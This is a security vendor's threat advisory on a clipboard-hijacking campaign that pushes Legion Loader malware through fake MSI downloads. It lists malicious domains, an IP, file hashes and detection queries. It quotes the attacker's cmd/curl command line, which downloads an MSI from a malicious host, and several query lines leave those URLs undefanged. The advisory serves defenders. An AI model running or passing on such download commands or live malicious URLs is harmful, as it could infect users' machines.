Evasive Campaign Pushing Legion Loader Malware

    Friday, April 4, 2025 In: Threat Research Print

    Date: 04/04/2025

    Severity: High 

    Summary

    A stealthy web campaign is hijacking users' clipboards to trick them into executing MSI files tied to Legion Loader malware. These MSI files are disguised as "Klio Verfair Tools," a known alias for Legion Loader. The technique, known as "pastejacking" or "clipboard hijacking," instructs users to paste malicious content into the Run window. The campaign evades detection through layered cloaking tactics, including Turnstile/captcha gates, disguised blog-like download pages, unique URLs per infection, and non-functional links outside the intended infection flow.

    Indicators of Compromise (IOC) List

    Domain\URL :

    admi2fib4exit.com

    alae-bema4om-ef.com

    ated-troy.com

    berapt-medii.com

    best-experience-cool.com

    best-experience-top.com

    best-knowledge-good24.com

    best-knowledge-top.com

    bestknowledgegood.com

    blend-centra.com

    buyfile-enter-net.com

    byrls-unfar-tankka.com

    cannel-hubshi-tock-perit.com

    carien-shafii.com

    creditfile-share-every-fun.com

    creditfile-share-every-fun24.com

    creditfileaccessnetworkshop.com

    creditfilechainalleasycompany.com

    creditfilechainallsimple.com

    creditfileparteveryfun.com

    doup2dalf4if4shou.com

    duad-tess-piki.com

    ecb4teg4sepd4bunt.com

    file-access-web.com

    file-autolink-all-easy.com

    file-connection-all-ez.com

    file-enter-web.com

    file-link-all-easy.com

    file-link-all-simpleshop.com

    file-share-every-fun.com

    fileaccesscenter.com

    fileaccesschannel.com

    fileaccessibilitynetwork.com

    fileaccessnetworksecurity.com

    fileaccessnow.com

    filelinkallezcompany.com

    filelinkallsimple.com

    filepartallfunclub.com

    fileparteveryfun24.com

    fileshareallfun24.com

    fundus-dung-hause-tellee.com

    globalfile-link-all-easy.com

    globalfileshareeveryfun.com

    globalfileshareeveryfun24.com

    globalgreatexperiencegood.com

    great-experience-good24.com

    greatknowledgegood24.com

    hell4rec.com

    hine-crull-cared-exiler.com

    infoaccessnetwork.com

    leto2nazi-glee.com

    mnem2ptt4brr-cats.com

    pahmi-argyll-shivey.com

    premiumexperiencegood.com

    premiumknowledgegood24.com

    realcreditfileparteveryfun.com

    realfile-share-every-fun.com

    realfilemindparteveryfun.com

    realfilemindshareeveryfun.com

    realfilepartallfun.com

    realfileshareallfun24.com

    realmoreupload.com

    seid-incaic-mayda.com

    sendfilelinkalleasy.com

    slud2mill.com

    tappa-liter.com

    thebetterfileupload.com

    thefile-share-every-fun.com

    themoreuploaddesign.com

    themoreuploadllc.com

    upgradeupload.com

    webfile-chain-all-easy.com

    webfile-link-all-easy.com

    webfile-link-all-simplecompany.com

    webfilelinkallez.com

    yourdownloadbest.com

    gettraff.ru/wb?keyword=moneygram%20appleton%20wi

    ggtraff.ru/wb?keyword=spill%20guts%20meaning%20in%20urdu

    fecuq.co.za/YmrXLWy8?keyword=%C3%A1lgebra%20y%20trigonometr%C3%ADa%20con%20geometr%C3%ADa%20anal%C3%ADtica%20ejercicios%20resueltos

    tevav.co.za/YmrXLWy8?keyword=camera%20canon%20powershot%20sx20is%20%C3%A9%20boa

    lovig.co.za/YmrXLWy8?keyword=modelo%20de%20memor%C3%A1ndum%20de%20llamada%20de%20atenci%C3%B3n%20por%20tardanza

    yubit.co.za/YmrXLWy8?keyword=mahatma%20gandhi%20biography%20pdf%20download

    colod.co.za/YmrXLWy8?keyword=how%20much%20is%20a%2020%20inch%20tv%20at%20walmart

    yoyep.co.za/YmrXLWy8?keyword=binomial%20theorem%20solution%20pdf%20worksheets%20answers%20answer/

    loheb.co.za/YmrXLWy8?keyword=paulo%20freire%20the%20banking%20concept%20of%20education%20analysis

    fecuq.co.za/YmrXLWy8?keyword=wilderness%20and%20the%20american%20mind%20chapter%20summaries

    norin.co.za/YmrXLWy8?keyword=bobbi%20brown%20makeup%20artist%20training

    IP Address : 

    188.72.236.249

    Hash :

    21df75dccea2946c1a28d9c46e722cdeaee00482a57bca9286cda59b172b2d9b

    eef55d89a46dd43a2bd72852a5bd2929458da58f293e65f951a1d17c3a784440

    Commandline : 

    cmd /k "curl -o %USERPROFILE%\Downloads\spill_guts_meaning_in_urdu00.msi 

    hxxp[:]//admi2fib4exit[.]com/?download=4e4b619f && 

    explorer /select,%USERPROFILE%\Downloads\spill_guts_meaning_in_urdu00.msi"

     

    cmd /k "curl -o %USERPROFILE%\Downloads\parallel_universe_books54.msi 

    hxxp[:]//admi2fib4exit[.]com/?download=16827aff && 

    explorer /select,%USERPROFILE%\Downloads\parallel_universe_books54.msi"

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    Domain\URL 1 :

    domainname like "bestknowledgegood.com" or url like "bestknowledgegood.com" or siteurl like "bestknowledgegood.com" or domainname like "globalgreatexperiencegood.com" or url like "globalgreatexperiencegood.com" or siteurl like "globalgreatexperiencegood.com" or domainname like "file-link-all-simpleshop.com" or url like "file-link-all-simpleshop.com" or siteurl like "file-link-all-simpleshop.com" or domainname like "doup2dalf4if4shou.com" or url like "doup2dalf4if4shou.com" or siteurl like "doup2dalf4if4shou.com" or domainname like "fileaccesschannel.com" or url like "fileaccesschannel.com" or siteurl like "fileaccesschannel.com" or domainname like "realfileshareallfun24.com" or url like "realfileshareallfun24.com" or siteurl like "realfileshareallfun24.com" or domainname like "slud2mill.com" or url like "slud2mill.com" or siteurl like "slud2mill.com" or domainname like "fileparteveryfun24.com" or url like "fileparteveryfun24.com" or siteurl like "fileparteveryfun24.com" or domainname like "filepartallfunclub.com" or url like "filepartallfunclub.com" or siteurl like "filepartallfunclub.com" or domainname like "leto2nazi-glee.com" or url like "leto2nazi-glee.com" or siteurl like "leto2nazi-glee.com" or domainname like "realfilepartallfun.com" or url like "realfilepartallfun.com" or siteurl like "realfilepartallfun.com" or domainname like "upgradeupload.com" or url like "upgradeupload.com" or siteurl like "upgradeupload.com" or domainname like "webfile-link-all-easy.com" or url like "webfile-link-all-easy.com" or siteurl like "webfile-link-all-easy.com" or domainname like "fileshareallfun24.com" or url like "fileshareallfun24.com" or siteurl like "fileshareallfun24.com" or domainname like "infoaccessnetwork.com" or url like "infoaccessnetwork.com" or siteurl like "infoaccessnetwork.com" or domainname like "webfile-chain-all-easy.com" or url like "webfile-chain-all-easy.com" or siteurl like "webfile-chain-all-easy.com" or domainname like "duad-tess-piki.com" or url like "duad-tess-piki.com" or siteurl like "duad-tess-piki.com" or domainname like "hine-crull-cared-exiler.com" or url like "hine-crull-cared-exiler.com" or siteurl like "hine-crull-cared-exiler.com" or domainname like "alae-bema4om-ef.com" or url like "alae-bema4om-ef.com" or siteurl like "alae-bema4om-ef.com" or domainname like "ecb4teg4sepd4bunt.com" or url like "ecb4teg4sepd4bunt.com" or siteurl like "ecb4teg4sepd4bunt.com" or domainname like "seid-incaic-mayda.com" or url like "seid-incaic-mayda.com" or siteurl like "seid-incaic-mayda.com" or domainname like "ated-troy.com" or url like "ated-troy.com" or siteurl like "ated-troy.com" or domainname like "admi2fib4exit.com" or siteurl like "admi2fib4exit.com" or url like "admi2fib4exit.com" or domainname like "creditfileaccessnetworkshop.com" or url like "creditfileaccessnetworkshop.com" or siteurl like "creditfileaccessnetworkshop.com" or domainname like "file-connection-all-ez.com" or url like "file-connection-all-ez.com" or siteurl like "file-connection-all-ez.com" or domainname like "globalfileshareeveryfun24.com" or url like "globalfileshareeveryfun24.com" or siteurl like "globalfileshareeveryfun24.com" or domainname like "realcreditfileparteveryfun.com" or url like "realcreditfileparteveryfun.com" or siteurl like "realcreditfileparteveryfun.com" or domainname like "tappa-liter.com" or url like "tappa-liter.com" or siteurl like "tappa-liter.com" or domainname like "realfile-share-every-fun.com" or url like "realfile-share-every-fun.com" or siteurl like "realfile-share-every-fun.com" or domainname like "realmoreupload.com" or url like "realmoreupload.com" or siteurl like "realmoreupload.com" or domainname like "creditfile-share-every-fun.com" or url like "creditfile-share-every-fun.com" or siteurl like "creditfile-share-every-fun.com" or domainname like "creditfileparteveryfun.com" or url like "creditfileparteveryfun.com" or siteurl like "creditfileparteveryfun.com" or domainname like "globalfileshareeveryfun.com" or url like "globalfileshareeveryfun.com" or siteurl like "globalfileshareeveryfun.com" or domainname like "premiumexperiencegood.com" or url like "premiumexperiencegood.com" or siteurl like "premiumexperiencegood.com" or domainname like "file-link-all-easy.com" or url like "file-link-all-easy.com" or siteurl like "file-link-all-easy.com" or domainname like "great-experience-good24.com" or url like "great-experience-good24.com" or siteurl like "great-experience-good24.com" or domainname like "blend-centra.com" or url like "blend-centra.com" or siteurl like "blend-centra.com" or domainname like "thefile-share-every-fun.com" or url like "thefile-share-every-fun.com" or siteurl like "thefile-share-every-fun.com" or domainname like "best-experience-cool.com" or url like "best-experience-cool.com" or siteurl like "best-experience-cool.com" or domainname like "byrls-unfar-tankka.com" or url like "byrls-unfar-tankka.com" or siteurl like "byrls-unfar-tankka.com" or domainname like "carien-shafii.com" or url like "carien-shafii.com" or siteurl like "carien-shafii.com" or domainname like "creditfile-share-every-fun24.com" or url like "creditfile-share-every-fun24.com" or siteurl like "creditfile-share-every-fun24.com" or domainname like "fileaccessnetworksecurity.com" or url like "fileaccessnetworksecurity.com" or siteurl like "fileaccessnetworksecurity.com" or domainname like "webfile-link-all-simplecompany.com" or url like "webfile-link-all-simplecompany.com" or siteurl like "webfile-link-all-simplecompany.com"  or domainname like "filelinkallsimple.com" or url like "filelinkallsimple.com" or siteurl like "filelinkallsimple.com" or domainname like "best-experience-top.com" or url like "best-experience-top.com" or siteurl like "best-experience-top.com" or domainname like "premiumknowledgegood24.com" or url like "premiumknowledgegood24.com" or siteurl like "premiumknowledgegood24.com" or domainname like "thebetterfileupload.com" or url like "thebetterfileupload.com" or siteurl like "thebetterfileupload.com" or domainname like "hell4rec.com" or url like "hell4rec.com" or siteurl like "hell4rec.com" or domainname like "fileaccessibilitynetwork.com" or url like "fileaccessibilitynetwork.com" or siteurl like "fileaccessibilitynetwork.com" or domainname like "berapt-medii.com" or url like "berapt-medii.com" or siteurl like "berapt-medii.com"

    Domain\URL 2 :

    domainname like "best-knowledge-good24.com" or url like "best-knowledge-good24.com" or siteurl like "best-knowledge-good24.com" or domainname like "best-knowledge-top.com" or url like "best-knowledge-top.com" or siteurl like "best-knowledge-top.com" or domainname like "buyfile-enter-net.com" or url like "buyfile-enter-net.com" or siteurl like "buyfile-enter-net.com" or domainname like "cannel-hubshi-tock-perit.com" or url like "cannel-hubshi-tock-perit.com" or siteurl like "cannel-hubshi-tock-perit.com" or domainname like "creditfilechainalleasycompany.com" or url like "creditfilechainalleasycompany.com" or siteurl like "creditfilechainalleasycompany.com" or domainname like "creditfilechainallsimple.com" or url like "creditfilechainallsimple.com" or siteurl like "creditfilechainallsimple.com" or domainname like "file-access-web.com" or url like "file-access-web.com" or siteurl like "file-access-web.com" or domainname like "file-autolink-all-easy.com" or url like "file-autolink-all-easy.com" or siteurl like "file-autolink-all-easy.com" or domainname like "file-enter-web.com" or url like "file-enter-web.com" or siteurl like "file-enter-web.com" or domainname like "file-share-every-fun.com" or url like "file-share-every-fun.com" or siteurl like "file-share-every-fun.com" or domainname like "fileaccesscenter.com" or url like "fileaccesscenter.com" or siteurl like "fileaccesscenter.com" or domainname like "fileaccessnow.com" or url like "fileaccessnow.com" or siteurl like "fileaccessnow.com" or domainname like "filelinkallezcompany.com" or url like "filelinkallezcompany.com" or siteurl like "filelinkallezcompany.com" or domainname like "fundus-dung-hause-tellee.com" or url like "fundus-dung-hause-tellee.com" or siteurl like "fundus-dung-hause-tellee.com" or domainname like "globalfile-link-all-easy.com" or url like "globalfile-link-all-easy.com" or siteurl like "globalfile-link-all-easy.com" or domainname like "greatknowledgegood24.com" or url like "greatknowledgegood24.com" or siteurl like "greatknowledgegood24.com" or domainname like "mnem2ptt4brr-cats.com" or url like "mnem2ptt4brr-cats.com" or siteurl like "mnem2ptt4brr-cats.com" or domainname like "pahmi-argyll-shivey.com" or url like "pahmi-argyll-shivey.com" or siteurl like "pahmi-argyll-shivey.com" or domainname like "realfilemindparteveryfun.com" or url like "realfilemindparteveryfun.com" or siteurl like "realfilemindparteveryfun.com" or domainname like "realfilemindshareeveryfun.com" or url like "realfilemindshareeveryfun.com" or siteurl like "realfilemindshareeveryfun.com" or domainname like "sendfilelinkalleasy.com" or url like "sendfilelinkalleasy.com" or siteurl like "sendfilelinkalleasy.com" or domainname like "themoreuploaddesign.com" or url like "themoreuploaddesign.com" or siteurl like "themoreuploaddesign.com" or domainname like "themoreuploadllc.com" or url like "themoreuploadllc.com" or siteurl like "themoreuploadllc.com" or domainname like "webfilelinkallez.com" or url like "webfilelinkallez.com" or siteurl like "webfilelinkallez.com" or domainname like "yourdownloadbest.com" or url like "yourdownloadbest.com" or siteurl like "yourdownloadbest.com" or domainname like "fecuq.co.za/YmrXLWy8?keyword=%C3%A1lgebra%20y%20trigonometr%C3%ADa%20con%20geometr%C3%ADa%20anal%C3%ADtica%20ejercicios%20resueltos" or url like "fecuq.co.za/YmrXLWy8?keyword=%C3%A1lgebra%20y%20trigonometr%C3%ADa%20con%20geometr%C3%ADa%20anal%C3%ADtica%20ejercicios%20resueltos" or siteurl like "fecuq.co.za/YmrXLWy8?keyword=%C3%A1lgebra%20y%20trigonometr%C3%ADa%20con%20geometr%C3%ADa%20anal%C3%ADtica%20ejercicios%20resueltos" or domainname like "tevav.co.za/YmrXLWy8?keyword=camera%20canon%20powershot%20sx20is%20%C3%A9%20boa" or url like "tevav.co.za/YmrXLWy8?keyword=camera%20canon%20powershot%20sx20is%20%C3%A9%20boa" or siteurl like "tevav.co.za/YmrXLWy8?keyword=camera%20canon%20powershot%20sx20is%20%C3%A9%20boa" or domainname like "lovig.co.za/YmrXLWy8?keyword=modelo%20de%20memor%C3%A1ndum%20de%20llamada%20de%20atenci%C3%B3n%20por%20tardanza" or url like "lovig.co.za/YmrXLWy8?keyword=modelo%20de%20memor%C3%A1ndum%20de%20llamada%20de%20atenci%C3%B3n%20por%20tardanza" or siteurl like "lovig.co.za/YmrXLWy8?keyword=modelo%20de%20memor%C3%A1ndum%20de%20llamada%20de%20atenci%C3%B3n%20por%20tardanza" or domainname like "yubit.co.za/YmrXLWy8?keyword=mahatma%20gandhi%20biography%20pdf%20download" or url like "yubit.co.za/YmrXLWy8?keyword=mahatma%20gandhi%20biography%20pdf%20download" or siteurl like "yubit.co.za/YmrXLWy8?keyword=mahatma%20gandhi%20biography%20pdf%20download" or domainname like "colod.co.za/YmrXLWy8?keyword=how%20much%20is%20a%2020%20inch%20tv%20at%20walmart" or url like "colod.co.za/YmrXLWy8?keyword=how%20much%20is%20a%2020%20inch%20tv%20at%20walmart" or siteurl like "colod.co.za/YmrXLWy8?keyword=how%20much%20is%20a%2020%20inch%20tv%20at%20walmart" or domainname like "yoyep.co.za/YmrXLWy8?keyword=binomial%20theorem%20solution%20pdf%20worksheets%20answers%20answer/" or url like "yoyep.co.za/YmrXLWy8?keyword=binomial%20theorem%20solution%20pdf%20worksheets%20answers%20answer/" or siteurl like "yoyep.co.za/YmrXLWy8?keyword=binomial%20theorem%20solution%20pdf%20worksheets%20answers%20answer/" or domainname like "loheb.co.za/YmrXLWy8?keyword=paulo%20freire%20the%20banking%20concept%20of%20education%20analysis" or url like "loheb.co.za/YmrXLWy8?keyword=paulo%20freire%20the%20banking%20concept%20of%20education%20analysis" or siteurl like "loheb.co.za/YmrXLWy8?keyword=paulo%20freire%20the%20banking%20concept%20of%20education%20analysis" or domainname like "fecuq.co.za/YmrXLWy8?keyword=wilderness%20and%20the%20american%20mind%20chapter%20summaries" or url like "fecuq.co.za/YmrXLWy8?keyword=wilderness%20and%20the%20american%20mind%20chapter%20summaries" or url like "fecuq.co.za/YmrXLWy8?keyword=wilderness%20and%20the%20american%20mind%20chapter%20summaries" or siteurl like "fecuq.co.za/YmrXLWy8?keyword=wilderness%20and%20the%20american%20mind%20chapter%20summaries" or domainname like "norin.co.za/YmrXLWy8?keyword=bobbi%20brown%20makeup%20artist%20training" or url like "norin.co.za/YmrXLWy8?keyword=bobbi%20brown%20makeup%20artist%20training" or siteurl like "norin.co.za/YmrXLWy8?keyword=bobbi%20brown%20makeup%20artist%20training" or domainname like "gettraff.ru/wb?keyword=moneygram%20appleton%20wi" or url like "gettraff.ru/wb?keyword=moneygram%20appleton%20wi" or siteurl like "gettraff.ru/wb?keyword=moneygram%20appleton%20wi" or domainname like "ggtraff.ru/wb?keyword=spill%20guts%20meaning%20in%20urdu" or url like "ggtraff.ru/wb?keyword=spill%20guts%20meaning%20in%20urdu" or siteurl like "ggtraff.ru/wb?keyword=spill%20guts%20meaning%20in%20urdu"

    IP Address :

    dstipaddress IN ("188.72.236.249") or srcipaddress IN ("188.72.236.249")

    Hash :

    sha256hash IN ("eef55d89a46dd43a2bd72852a5bd2929458da58f293e65f951a1d17c3a784440","21df75dccea2946c1a28d9c46e722cdeaee00482a57bca9286cda59b172b2d9b")

    Detection Query :

    resourcename = "Windows Security" and (Commandline like "cmd /k" and commandline like "curl -o %USERPROFILE%\Downloads\spill_guts_meaning_in_urdu00.msi" and commandline like  "http://admi2fib4exit.com/?download=4e4b619f" and commandline like "&&  explorer /select,%USERPROFILE%\Downloads\spill_guts_meaning_in_urdu00.msi") OR (commandline like "cmd /k " and commandline like "curl -o %USERPROFILE%\Downloads\parallel_universe_books54.msi" and commandline like "http://admi2fib4exit.com/?download=16827aff" and commandline like "&& explorer /select,%USERPROFILE%\Downloads\parallel_universe_books54.msi")

    Detection Query :

    technologygroup = "EDR" and (Commandline like "cmd /k" and commandline like "curl -o %USERPROFILE%\Downloads\spill_guts_meaning_in_urdu00.msi" and commandline like  "http://admi2fib4exit.com/?download=4e4b619f" and commandline like "&&  explorer /select,%USERPROFILE%\Downloads\spill_guts_meaning_in_urdu00.msi") OR (commandline like "cmd /k " and commandline like "curl -o %USERPROFILE%\Downloads\parallel_universe_books54.msi" and commandline like "http://admi2fib4exit.com/?download=16827aff" and commandline like "&& explorer /select,%USERPROFILE%\Downloads\parallel_universe_books54.msi")

    Reference:    

    https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-03-31-IOCs-for-evasive-campaign-pushing-Legion-Loader.txt


    Tags

    MalwareEVASIVELEGION LOADERPastejackingClipboard hijacking

    « Previous ArticleNext Article »

    Comments

    No records to display

    Looking for Something?
    Threat Research Categories:
    Tags

    Privacy & Security StatementTerms & Conditions
    Copyright © 2025 by Gurucul - All rights reserved.